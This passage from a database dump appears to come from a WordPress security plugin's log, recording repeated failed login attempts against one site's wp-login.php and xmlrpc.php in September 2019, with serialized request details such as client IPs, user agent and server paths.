Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"159.65.69.32\";s:11:\"REMOTE_PORT\";s:5:\"33544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFNF475s89pqgR69SLWcgAAAZM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568754967.7103\";s:12:\"REQUEST_TIME\";s:10:\"1568754967\";}}','notice','2019-09-17 21:16:09','2019-09-17 21:16:08',18255992,19555248,'https://bintara.com.my/xmlrpc.php',1,0,'159.65.69.32'),(24750,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.202.29.156\";s:11:\"REMOTE_PORT\";s:5:\"49746\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFOCY75s89pqgR69SLW7AAAAZU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568755209.4657\";s:12:\"REQUEST_TIME\";s:10:\"1568755209\";}}','notice','2019-09-17 21:20:10','2019-09-17 21:20:09',17739928,19230384,'https://bintara.com.my/wp-login.php',1,0,'144.202.29.156'),(24751,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.202.29.156\";s:11:\"REMOTE_PORT\";s:5:\"50562\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFODI75s89pqgR69SLW7gAAAYc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568755212.7874\";s:12:\"REQUEST_TIME\";s:10:\"1568755212\";}}','notice','2019-09-17 21:20:14','2019-09-17 21:20:13',18255672,19554536,'https://bintara.com.my/xmlrpc.php',1,0,'144.202.29.156'),(24752,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"159.89.48.99\";s:11:\"REMOTE_PORT\";s:5:\"41702\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFPno75s89pqgR69SLXsgAAAY0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568755615.0266\";s:12:\"REQUEST_TIME\";s:10:\"1568755615\";}}','notice','2019-09-17 21:26:56','2019-09-17 21:26:55',17739144,19230920,'https://bintara.com.my/wp-login.php',1,0,'159.89.48.99'),(24753,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"159.89.48.99\";s:11:\"REMOTE_PORT\";s:5:\"42656\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFPoyqbKGlf1IVly7N5uQAAAVc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568755619.7777\";s:12:\"REQUEST_TIME\";s:10:\"1568755619\";}}','notice','2019-09-17 21:27:01','2019-09-17 21:27:00',18256544,19555936,'https://bintara.com.my/xmlrpc.php',1,0,'159.89.48.99'),(24754,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"38554\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFQDSqbKGlf1IVly7N5yAAAAUA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568755725.4773\";s:12:\"REQUEST_TIME\";s:10:\"1568755725\";}}','notice','2019-09-17 21:28:46','2019-09-17 21:28:45',17739848,19230688,'https://bintara.com.my/wp-login.php',1,0,'185.84.180.90'),(24755,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"39016\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFQEI75s89pqgR69SLX3gAAAY8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568755728.489\";s:12:\"REQUEST_TIME\";s:10:\"1568755728\";}}','notice','2019-09-17 21:28:50','2019-09-17 21:28:48',18256704,19556336,'https://bintara.com.my/xmlrpc.php',1,0,'185.84.180.90'),(24756,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.175.10.113\";s:11:\"REMOTE_PORT\";s:5:\"56452\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFRSo75s89pqgR69SLYmwAAAZc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568756042.2335\";s:12:\"REQUEST_TIME\";s:10:\"1568756042\";}}','notice','2019-09-17 21:34:04','2019-09-17 21:34:02',17740608,19231688,'https://bintara.com.my/wp-login.php',1,0,'108.175.10.113'),(24757,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.175.10.113\";s:11:\"REMOTE_PORT\";s:5:\"57260\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFRTUQGijxhVPhG1M3@5AAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568756045.8903\";s:12:\"REQUEST_TIME\";s:10:\"1568756045\";}}','notice','2019-09-17 21:34:07','2019-09-17 21:34:06',18257176,19556344,'https://bintara.com.my/xmlrpc.php',1,0,'108.175.10.113'),(24758,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 